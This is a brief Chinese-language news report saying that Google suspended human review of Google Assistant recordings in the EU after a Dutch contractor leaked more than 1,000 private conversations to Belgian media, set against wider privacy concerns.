北京时间8月2日早间消息,谷歌发言人周四向路透社表示,在荷兰录音数据泄露后,该公司暂停评估Google Assistant虚拟助手在欧盟收集的录音。 该公司今年7月承认,负责分析智能助手语音片段的合作伙伴泄露了数据。 CNBC早些时候报道称,有超过1000次私人谈话被发送到比利时的新闻媒体,并补充说有些消息透露出医疗状况和客户地址等敏感信息。 “在了解到荷兰机密信息泄漏事件后不久,我们暂停了对调查助手的语言评估。”该发言人说。她还补充道,该公司仅对约0.2%音频内容进行评估。 此事正值公众和政府对数据隐私措施越来越关注之际,迫使硅谷公司提高了透明度。 美国和其他地方的立法者正在对相关提案进行权衡,可能会限制谷歌、Facebook和其他互联网公司追踪用户和分发信息的方式。 据悉,谷歌此次暂停评估至少会持续三个月时间。   (稿源:新浪科技,封面源自网络。)